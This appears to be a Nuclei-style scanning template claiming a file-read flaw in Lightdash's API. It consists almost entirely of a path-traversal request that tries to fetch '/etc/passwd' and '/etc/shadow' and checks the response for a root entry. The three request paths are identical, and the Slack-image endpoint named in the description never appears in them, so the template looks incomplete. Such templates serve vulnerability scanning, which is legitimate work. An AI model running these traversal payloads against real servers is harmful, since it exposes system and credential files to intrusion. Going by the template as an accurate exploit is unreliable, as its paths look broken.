id: lightdash-lfi111

info:
  name: lightdash api file read
  severity: high
  description: |
    lightdash has an api endpoint to read slack image but it can abused to read arbitray file
  author: reewarius
  tags: lfi,lfr,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{ url_encode(concat('/../../../../..', file)) }}"
      - "{{BaseURL}}/{{ url_encode(concat('/../../../../..', file)) }}"
      - "{{BaseURL}}/{{ url_encode(concat('/../../../../..', file)) }}"
      
    payloads:
      file:
        - "/etc/passwd"
        - "/etc/shadow"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'